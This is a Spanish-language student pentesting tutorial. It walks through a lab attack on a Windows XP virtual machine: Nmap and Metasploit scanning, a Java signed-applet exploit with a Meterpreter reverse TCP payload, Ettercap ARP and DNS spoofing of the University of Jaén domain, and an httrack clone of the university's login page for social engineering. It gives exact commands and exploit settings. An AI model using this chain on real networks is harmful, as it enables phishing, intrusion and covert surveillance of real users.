You are on page 1of 25

Episodio de Pentesting

Hello world, I’m backtrack

Nicolás Moral de Aguilar Seguridad en tecnologías de la información

Índice
1. 2. 3. 4. 5. 6. 7. 8. 9. Planteamiento del episodio Conceptos necesarios Configuración del escenario Escaneo a la víctima Elección de vulnerabilidad Configuración del exploit Envenenamiento DNS Ingeniería social Meterpreter en acción Anexos

2

Para explicar el procedimiento. En la primera fase. que permitirán entender de manera más sencilla todo el proceso. explicaré el procedimiento habitual en el que entra en juego la ingeniería social para hacer que las posibles víctimas acepten la ejecución del applet. Tras eso. Más tarde. y dependiendo del tipo de exploit. habrá que seguir un procedimiento para hacer que el ataque se haga efectivo. voy a especificar varias fases por separado. Presentación del episodio En el episodio de penetración que se expone a lo largo de este proyecto.1. hay que analizar los mismos para ver cómo y qué vulnerabilidades se pueden aprovechar. Así mismo. se debe realizar un escaneo de la LAN en la que se sitúa el episodio para visualizar la estructura de la red y detectar posibles equipos vulnerables. se realizará una explicación detallada de cómo conseguir hacerse con un ordenador remoto aprovechando una vulnerabilidad de Java en navegadores. que permite la ejecución de código malicioso tras aceptar un applet de Java en cualquier navegador y/o sistema operativo. 3 . se debe configurar el exploit necesario para aprovechar dicha vulnerabilidad.

como Nmap o AirCrack. puesto que el escenario precisa de actualización de diversos componentes dentro de la VM. direcciones del tipo 192. Justamente esta última característica es la que a nosotros nos interesa para nuestra simulación de escenario. me referiré a esto como Backtrack. Sin embargo. es un programa que recopila una base de datos de exploits autoactualizable que permite aprovechar las posibles vulnerabilidades que tengan los equipos atacados. Conceptos necesarios Para la compresión de este proyecto necesitaremos tener algunas definiciones y conceptos claros.X y el guest. pasando por herramientas de ingeniería inversa. En el desarrollo del episodio.04 LTS (Lucid Lynx) y está disponible en arquitecturas de 32. Backtrack 5 R3 Distribución de Linux basada en Ubuntu destinada a la seguridad. así que voy a dar una breve explicación de todos los términos que considero necesarios para entender el desarrollo del mismo. como Galleta. como IDA Pro. Soporta direcciones activas y pasivas de varios protocolos. Como dato adicional. Ettercap Realiza las funciones de sniffer. BT o BT5.X. En su última versión incorpora las versiones actualizadas de muchas de las utilidades de Linux más usadas en el ámbito de la seguridad informática. Los más usados suelen ser el modo NAT. 64 bits y en ARM. se convierte en una herramienta increíble. Lo explicaremos de forma más extensa en el apartado de Envenenamiento de DNS VB Bridged Network Mode VirtualBox dispone de varios modos de configuración de la tarjeta de red virtualizada de las guest. o de análisis forense. con IP habitualmente de tipo 192.X. llamada Armitage. existe una interfaz gráfica disponible para los que odien la CLI (Command Line Interface). Y también se usa habitualmente el modo red interna. que crea un puente de conexión entre el host. Además. Abarca desde programas destinados al pentesting. Junto con NMap.168. incluido SSH y HTTPS. Metasploit o MSF. posiblemente sea la distribución más utilizada.2.X. en todo el desarrollo del episodio os llamará la atención la ausencia de “sudo” en los comandos.X. el cual se configura en otra red 10. pero la razón es que este sistema utiliza la cuenta de administrador por defecto. La distribución se basa más concretamente en Ubuntu 10. interceptor y registrador para cualquier LAN. de la que hablaré en uno de los anexos del proyecto.X. Hace posible la inyección de datos en una conexión establecida y permite el filtrado al vuelo aun manteniendo la conexión sincronizada gracias a la característica de realizar ataques MiTM (Man in the middle). he configurado la red como Bridged Network (Red Puenteada) que añade ambas VM a la red local y les asigna. de análisis de redes. Metasploit Framework Es una herramienta imprescindible para cualquier informático que trabaje con test de penetración. En el ámbito de la seguridad.X. Ello nos permitirá tener 4 . como Metasploit Framework o SET. como es evidente.168. que conecta directamente todas las guest en una misma red.

Es decir. NMap. la parte del troyano que se encarga de los cambios de configuración. como pueden ser Metasploit. PAYLOAD Es un término que se refiere al código o herramienta que tras la infección de una víctima. tanto la atacante como la atacada. 5 . SET Social Engineering Toolkit es una suite en CLI que nos facilita una interfaz en consola para automatizar el uso de ataques de penetración habituales compenetrando varias herramientas de la distribución. o secuencia de comandos que se crea con el fin de causar un error o un fallo en alguna aplicación. a fin de causar un comportamiento no deseado o imprevisto en un sistema o componente. Le echaremos un vistazo en el apartado de anexos. y ejecución de cualquier orden no legítima. y además tener en ambas conexión a internet para actualizar los componentes necesarios. Habitualmente supone la ejecución remota de código. permite realizar todo tipo de efectos secundarios. Apache Server. la escalada de privilegios o incluso un ataque DOS.ambas máquinas virtuales conectadas. EXPLOIT Es un software. etc… implementando en una misma aplicación la automatización de los ataques.

Tras instalar VirtualBox. vamos a utilizar dos máquinas virtuales interconectadas. podemos usar versiones diferentes de ambos SO. A continuación voy a mostrar la configuración que he dispuesto en cada una de los sistemas invitados.3. con una IP del tipo 192. La máquina virtual está configurada como Bridged Network por lo que se adhiere a la LAN a la que pertenece el sistema host. En el momento de más carga. Configuración del escenario Para poner en marcha un escenario de una simulación de un ataque de penetración o pentesting.X Windows XP SP3 contiene las últimas actualizaciones de Windows Update y está configurado también como Bridged Network. pero en este caso he escogido las versiones más actualizadas de ambos.168. tiene actualizado SET a la última versión desde su propio menú de opciones. deberían estar un servidor Apache. Backtrack 5 R3. vamos a necesitar una ISO de Windows XP SP3 y otra de Backtrack 5 R3 para instalar cada una en una VM distinta. por lo que tiene otra IP perteneciente a la red local del host. está instalado en un disco duro virtual y se le han asignado 512Mb de RAM. Además está instalado Google Chrome por si necesito hacer alguna búsqueda durante el desarrollo 6 . las cuales vamos a configurar de la manera apropiada para que el ataque pueda llevarse a cabo de manera exitosa. (Proceso de instalación de las dos VM) Evidentemente.1. El sistema está actualizado con la siguiente lista de órdenes: “apt-get update && apt-get upgrade” “msfupdate” Además. MSF y Ettercap. Incluso es suficiente con bastante menos memoria puesto que el ataque que vamos a realizar no necesita tener demasiados programas en memoria.

estamos listos para entrar en materia e iniciar nuestro MSF. ya que la vulnerabilidad está en el JRE. y de paso para demostrar que independientemente del navegador instalado.*”. el sistema sigue siendo vulnerable. propongo hacer una Snapshot de ambas máquinas virtuales.del proyecto. pero es recomendable por si a alguien se le va la mano con la consola de Meterpreter y teclea un “rm –r *. y evidentemente Windows ya viene bien capado de serie. (Configuración de red de ambas VM) Con ambas máquinas virtuales funcionando y actualizadas correctamente. 7 . la parte que viene a continuación se desarrolla de forma íntegra en la VM de BT5. No es estrictamente necesario ya que no vamos a tocar nada relacionado con el kernel ni con el boot de BT5. Como recomendación adicional. por lo que supongo la ejecución de órdenes con “sudo” y que todas ellas se ejecutan en BT. Hasta nueva orden.

lo primero es ejecutar un análisis de puertos.4. y añade un scan de SO con el atributo –A.26” (Orden ejecutada en BT5) La orden anterior básicamente realiza un scan rápido a la IP que especificamos. Escaneo a la víctima Lo primero que necesitamos para poder hacer uso de nuestro supuesto exploit. del cual pondré un ejemplo simplemente por lo que explicaré a continuación. y con el fin de escanear las posibles vulnerabilidades que expongan a las víctimas ante nuestro ataque. es seleccionar una o varias víctimas en las que tratar de hacer efectivo el ataque. Escaneo vía Nmap Ejecutamos en terminal la siguiente orden: “nmap –A 192. necesitamos información sobre las direcciones a las que vamos a atacar. 8 . Para ello.168. Y a estas alturas estaréis pensando en Nmap. Así que sería bastante fácil ponernos manos a la obra y ejecutar un escaneo generalizado con Nmap.1.168. y tras instalar las herramientas necesarias en nuestra máquina. Para ello.1. la cual evidentemente podemos utilizar. en este caso 192. pero puesto que es un ejemplo la he omitido.26. Habitualmente se usa también –v para visualizar más información del proceso.

por lo que buscamos algún scan para SMB.255. desde 192.168.1.168.1.168.Escanear una red mediante Nmap es una forma totalmente válida para lo que necesitamos en este proceso. (Ejecutando SYN scan) He configurado el RHOST con la dirección del equipo atacado porque en este caso la sabemos. pero como de momento solo necesito averiguar cuál es la versión del SO. ya que incluye módulos de escaneo. normalmente se realiza un scan a los equipos limitados por la máscara de subred 255. vamos a realizar el scan directamente desde el propio MSF. 9 .0.0 hasta 192. Escaneamos el puerto 445 que viene abierto por defecto en todos los Windows ya que es utilizado por SMB (Server Message Block. sistema para compartir archivos e impresoras de Microsoft) y que nos servirá para saber la versión del sistema operativo. pero para que se observe el potencial de Metasploit. Se especifica de la siguiente manera “set RHOSTS 192. me vale cualquiera.0/24”. incluso podríamos utilizar Zenmap que es la GUI de Nmap. Pero si quisiéramos escanear una red. Observamos que está abierto.255. iniciamos directamente la consola de Metasploit con “msfconsole” y vemos que escaneos tenemos disponibles para realizar con los siguientes comandos mostrados en la imagen siguiente.1. es decir. Los escaneos más habituales son el TCP y el SYN.255. Por tanto.

debemos pasar a la elaboración del plan de ataque. empezando por la elección de la vulnerabilidad que vamos a utilizar.(Ejecutando SMB scan) Una vez que sabemos el sistema operativo que ejecuta el sistema en cuestión y hemos obtenido la información adicional de puertos. 10 .

11 . es que la elección del exploit debe realizarse pensando en el sistema operativo de la víctima. en la victima. Sin embargo. El momento de elegir que vulnerabilidad vamos a aprovechar es importante. Elección de vulnerabilidad Gracias a MSF y su gigantesca base de datos de exploits funcionales. por lo que evita la ingeniería social. En este caso. tenemos miles de posibilidades para hacernos con un ordenador remoto. el payload entrará en la VM víctima y se ejecutará. que puede incluso firmarse si tenemos el JDK (Java Development Kit) instalado en la VM. junto con los payloads generados para los diferentes sistemas operativos. en este escenario voy a utilizar la que posiblemente sea la vulnerabilidad más utilizada de MSF. debido a su compatibilidad con diferentes navegadores y sistemas operativos. cuyas virtudes estudiaremos más adelante. creando una conexión “reverse-tcp” que se comunicará directamente con metasploit. El exploit aprovecha las vulnerabilidades CVE-2006-4446 y CVE2006-4777 y permite la apertura incluso de una sesión de meterpreter.5. lo cual es bastante interesante y aumenta con creces la maniobrabilidad de la ingeniería social. Para Windows XP destacar el exploit “ms08_067_netapi” que ha sido uno de los más utilizados durante la vida de XP. uno de los puntos más importantes. “Java_signed_applet”. Este complemento se inyecta en el servidor web independientemente de la página web que haya creada. y permite la ejecución de una sesión de meterpreter. ya que marcará el rumbo del proceso para hacernos con la máquina remota. Por tanto. ya que permite su ejecución sin intervención alguna del usuario remoto. y la escalada de privilegios en el sistema. y en los servicios que operan por defecto en los puertos que hayamos detectado abiertos. podríamos elegir vulnerabilidades de diferentes clases. El exploit se inyecta en el servidor http del atacante. Una vez hemos aceptado su ejecución. El exploit Java signed applet nos permite crear un complemento envenenado de java para el navegador.

Los parámetros se modifican como en el siguiente ejemplo: “set APPLETNAME EXPLOIT”. vamos a utilizar el payload más famoso de Metasploit que se llama Meterpreter. e incluso la firma del applet con CERTN.6. A continuación. Pero es importante echar un vistazo a SRVHOST. pero si no nos sabemos la ruta exacta podemos utilizar la función search de Metasploit. y su configuración por defecto. Configuración del exploit Lo primero que debemos hacer es llamar al exploit. por lo que no me voy a extender demasiado. podemos configurar el nombre del applet malicioso modificando APPLETNAME. la parte más importante de la configuración de un exploit consiste en la elección del Payload. el paso siguiente es setearlo en nuestro exploit. Al lado de cada parámetro viene una breve descripción del mismo. pues será el programa que se encargará de realizar la conexión inversa desde la víctima hasta el host. se nos muestran los parámetros de configuración modificables para el exploit. Se ve mejor en esta imagen: (Configuración básica de Metasploit) En la imagen de arriba podemos observar que si hacemos un “show options”. SRVPORT. y para ser más exactos. en su versión de puertos TCP. dando la siguiente instrucción: 12 . LHOST y para este exploit en concreto. Dicho esto. En este caso.

0. pero puesto que suponemos que la víctima está en la misma red local. MSF monta la inyección del exploit en una URL aleatoria del tipo http://127. Ahora solo deberemos hacer que la víctima entre en el enlace y permita la instalación del complemento de Java. lo que explicaremos a continuación. a través de un mail o de cualquier otro servicio.1/XXXXXXX pero si queremos especificar un nombre en la dirección tendremos que configurar URIPATH en la configuración del exploit.“set PAYLOAD windows/meterpreter/reverse_tcp” Una vez configurado completamente el exploit con las opciones que necesitemos escribimos en la consola de MSF “exploit” y automáticamente MSF montará el servidor web con el contenido infectado. 13 . vamos a usar DNS Poisoning. Para ello podríamos hacer uso de ingeniería inversa. De forma predeterminada.0.

Es este momento cuando C se encuentra justo en medio de la conexión entre A y B. y tenemos un ataque Man in the Middle en toda regla. que nos permitirá hacer sniff a todo el tráfico entre dos PC de la red. es una forma de ataque MiTM en el que el atacante hará que el PC atacado resuelva las direcciones con un servidor de DNS “alterado”. la que realizará el ataque. y otra respuesta ARP hacia A que mapea IP-B con MAC-C. Esto quiere decir que si un ordenador A. el host ni siquiera comprueba si fue enviada la respuesta ARP desde la misma IP que se solicitó en la petición. Imaginemos ordenador A y ordenador B. el protocolo no puede comprobar si la IP corresponde con su MAC. que permite redireccionar A a B. La máquina C. en este caso. supongamos que mi PC es el host A.1. Básicamente es un protocolo responsable de encontrar la dirección MAC correspondiente a una determinada IP. Además. confía en la información de respuesta y actualiza su cache ARP. IP forwarding (Redireccionamiento IP). ARP Reply: Todos los demás ordenadores de la red ignorarán la petición a excepción del que tenga esa dirección IP. Mi ordenador tiene una IP-A y una MAC-A. y mi router es el host B. o sea. más conocido por su traducción en inglés DNS Poissoning. llegará a C. y el router una IP-B y una MAC-B. pero creo que es hora de pasar a la práctica. como podemos observar parece fácil explotar el débil protocolo ARP. no hay manera de autenticar la IP con la dirección MAC contenida en el ARP Reply. ARP Request: El ordenador A pregunta en la red a quién pertenece una determinada IP. 14 . Como resultado. Por tanto. pero vamos a explicarlo de forma más detallada. Esto puede parecer un poco complejo al principio. Incluso si un host no envió una petición ARP pero si recibe una respuesta ARP. pongamos 192. envía una respuesta ARP a B que mapea IP-A con MAC-C. Primero introduciremos un nuevo concepto que no se definió en el tutorial porque consideré que era más conveniente verlo justo en el momento de su necesidad. Es posible enviar a la red entera una respuesta ARP en la que cualquier IP está mapeada a cualquier MAC. envía una petición y recibe una respuesta ARP. Toda esta teoría es imprescindible. Así que a continuación se explicará que es el Protocolo ARP (Adress Resolution Protocol) y el envenenamiento de su cache. Por tanto ahora cualquier paquete enviado desde A a B o desde B a A. La vulnerabilidad anterior permite el ataque a una LAN de varias formas. Para conseguir esto. Entonces es momento de activar en C. y como ya hemos indicado anteriormente utilizaremos la técnica Man in the Middle. Este ordenador contestará con un paquete que contendrá la IP requerida y su dirección MAC.168.1. Envenenamiento DNS A grandes rasgos un envenenamiento DNS. El protocolo fue diseñado para ser simple y eficiente pero su mayor defecto es la ausencia de autenticación.7.

Así que iniciamos Ettercap introduciendo en la terminal “ettercap -G”. elijo eth0. ya que es un rollazo aprenderse la ingente cantidad de comandos que tiene la CLI. y no es cómodo para trabajar. que son todos los host de la red listados con direcciones MAC correspondientes. por lo que hacemos click en “Hosts -> Scan for host”. (Ettercap en modo Unified Sniffing) Ahora vamos a escanear la red para ver los equipos. Ahora vemos información interesante. A continuación hacemos click en “Sniff -> Unified Sniffing” y se nos abrirá una ventana de selección en la que podremos escoger cualquiera de las interfaces disponibles. Como estoy trabajando en VB. que funciona con una interfaz creada con curses. 15 .Os presento a Ettercap. En esta ocasión vamos a utilizar la interfaz gráfica por su comodidad. que nos permitirá poner en práctica este ataque. Y cuando esté completado en “Hosts -> Host List”. En caso de no querer iniciar Xorg. por tanto seleccionamos un host y pulsamos en “Add to Target 1” y hacemos lo mismo con el otro host que queramos interceptar pero esta vez lo añadimos en “Add to Target 2”. Nos disponemos a hacer un ataque MiTM. podemos usar Ettercap –C.

1.1. lo que necesitamos es direccionar a la víctima a la dirección IP en la que hemos inyectado el exploit.168. Una vez hecho esto iniciamos el Sniff desde “Start -> Start Sniffing” Una vez que los paquetes están pasando por nuestro PC. “nano /usr/local/share/ettercap/etter.d ns” Aquí añadimos las líneas que queramos para redireccionar cualquier dirección a nuestra IP.(Seleccionando objetivos en Ettercap) Ahora seleccionamos “Mitm -> Arp Poisoning” y marcamos la opción de Sniff Remote Connection.es A 192.27 ujaen.27 16 .ujaen. Si estáis habituados al archivo de Linux hosts (/etc/hosts) veréis que la configuración se hace del mismo modo. Yo he puesto la dirección de la UJA añadiendo esto: *.es A 192. así que desde una terminal nos vamos a editar el archivo de configuración de DNS de Ettercap. para ello lo que vamos a hacer es redireccionar el DNS usando un plugin de Ettercap que se llama dns-spoof. Pero antes debemos editar el archivo de configuración que Ettercap dedica al dns.168.

como podemos ver en la siguiente imagen en la que se ve como haciendo un ping y entrando directamente en la web. nos redirecciona correctamente a nuestro servidor malicioso. y todo estará listo.Una vez hemos hecho eso. 17 . solo queda activar el plugin.

Se debe hacer caer a la víctima en la trampa. Creo que estamos de acuerdo en que un index. pero la verdad es que ocupa demasiado y tardaríamos en descargar el árbol de direcciones bastante rato. Me pongo manos a la obra. y aunque podría descargarme el código directamente con wget o con un right click en la misma web. httrack.ujaen. y una de las maneras más eficientes es suplantando la identidad de un sitio web habitual de tal manera que el usuario no se dé cuenta de la trampa. ya que a día de hoy es improbable que Google inserte un applet de Java en su buscador y me decidí por inyectarlo justo en el enlace de autenticación de dv.es” (httrack clonando www. “apt-get install httrack” Nos situamos en la carpeta que queramos descargar la web.8. esta es la parte más importante. decidí inyectarlo en un sitio más creíble.ujaen. Descargamos un programa que se encarga de hacer la tarea por nosotros.es. Pero… ¿Y si clonamos la web de Google? Pensé en clonar la UJA.html del tipo <h1>HOLA. Sin embargo después de no pocas reflexiones. SI ACEPTAS ESTE APPLET VOY A HACKEARTE EL PC</h1> no es demasiado útil. “httrack dv. Al final. o incluso copiando directamente el código fuente visible.es) 18 .google. Ingeniería social Durante el desarrollo del proyecto me estuve planteando la posibilidad de omitir este apartado. y ejecutamos el programa pasando como argumento la web que deseemos. cambiando el link en el código fuente hacia mi IP. creo que a nivel de poner en práctica este episodio en el mundo real. eso es una chapuza a no ser que nos queramos pasar un par de horas redireccionando hojas de estilo y contenido multimedia.

“cp dv. ya que lo estamos utilizando para alojar a la web clonada) 19 .XXX (Hay que tener cuidado de no establecer como Puerto del servidor el 80. Applications -> Backtrack -> Services -> HTTPD -> apache start Básicamente ya está todo copiado y listo para funcionar.1.ujaen. Os adjunto como información adicional los parámetros exactos que yo he utilizado para configurar el exploit y el payload en MSF.es/* /var/www” Una vez lo hemos copiado iniciamos el servidor apache desde el menú. ya sea únicamente el index o también archivos y carpetas asociados.Una vez copiada la web en la carpeta que hayamos definido por defecto (recomiendo que no sea directamente el servidor por si hay algún fallo) comprobamos que está bien en el navegador. y la copiamos directamente a la carpeta del servidor apache.168. set APPLETNAME UJA_AUTH set CERTCN Ujaen set URIPATH /authapplet set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.

es ejecutar una orden help. desde subir o descargar un archivo. Primero. hasta terminar un proceso o capturar el micro o la webcam. El payload es verdaderamente una obra de arte. Metasploit por defecto no nos redirige a la sesión abierta directamente. así que vemos los comandos por defecto. podría explicar uno por uno que hace cada comando. Para seleccionar una simplemente tenemos que escribir: (Exploit activando sesión y abriéndola en meterpreter) “sessions –i id” es decir… “sessions –i 1” Se nos abrirá una session de Meterpreter. Una vez ejecutado. 20 . Meterpreter en acción Exploit inyectado en la web esperamos pacientemente que nuestra ingeniería social haga acto de presencia ante la víctima y esta ejecute el complemento de Java. Meterpreter tiene muchísimas opciones con órdenes directas. pero puesto que viene una descripción del mismo en inglés creo que no tiene sentido y es mucho más divertido si lo investigas tú mismo. y lo primero que tenemos que hacer tras examiner un poquito la CLI. los que no conozcan Meterpreter se darán cuenta de por qué he elegido este payload y no uno de Shell normal. para ver qué podemos hacer con él. el applet se encargará de realizar automáticamente una conexión inversa hacia nuestro servidor por el puerto que hayamos especificado en LPORT y abrirá una sesión de Meterpreter para dejarnos en ordenador atacado a nuestra disposición. tendremos que abrirla nosotros. ejecutamos “sessions –l” y nos listará todas las sesiones que hayan activado nuestros troyanos de conexión inversa. En este momento.9.

(Algunos comandos de Meterpreter) 21 .

la búsqueda de ataques disponibles para las distintas posibles víctimas dependiendo de la información que consiga en los escaneos pertinentes. La interfaz se lanza directamente desde el menú de backtrack. voy a presentaros dos herramientas que os facilitarán el trabajo del día a día. Armitage Esta herramienta básicamente se encarga de proveer de interfaz gráfica a MSF. podemos suplir las carencias de la interfaz desde ahí. Su parte inferior. te permite elegir los ataques y te ofrece una configuración predeterminada para el mismo dependiendo del sistema operativo de la víctima. (Lanzando armitage desde el menú) 22 . pero ya que la propia interfaz dispone de una línea de comandos. como toda interfaz gráfica.Anexos Como información complementaria al proyecto. pero sin dejar de lado una línea de comandos. es una consola en la que se van abriendo pestañas para lanzar los diferentes procesos durante el ataque. Armitage tiene una barra superior que automatiza el escaneo de redes. Además. En cierto modo. Armitage y SET. pero relativa al mismo. reduce considerablemente las posibilidades del programa comparado con su interfaz CLI.

en la que hay vulnerados 3 dispositivos de la red) Como podéis ver la interfaz es bastante útil. y además hace el ataque mucho más vistoso si lo que queréis es hacer algún tipo de publicación o documento oficial.(Ventana de metasploit habitual cuando se arranca) (Ventana con un ataque en proceso. 23 .

pero automatiza la tarea hasta tal punto de basarse en un menú seleccionable con diferentes niveles. llegando incluso a portarse a un dispositivo iOS con Jailbreak. También viene incluido en la distribución de Backtrack. la verdad es que se ha convertido en una herramienta indispensable para cualquiera que trabaje en el área de pentesting. y el segundo hace lo mismo pero carga el servidor malicioso al cambiar de pestaña en el navegador de la víctima).SET Cuyo nombre completo es Social Engineering Toolkit es un conjunto de utilidades como su propio nombre indica que nos asiste en la tarea de poner en funcionamiento todo tipo de ataques en los que interviene la ingeniería social. Os dejo algunas imágenes. El software integra en muchas de sus partes secciones del propio Metasploit. Creado por David Kennedy. desde ataques vectoriales. (Menú principal de SET) 24 . hasta ataques como los de pass harvesting o tabnabbing (El primero es captura de contraseñas envenenando una petición GET o POST en nuestro servidor.

(Menú de ataques principal SET) (Selección de Payload SET) 25 .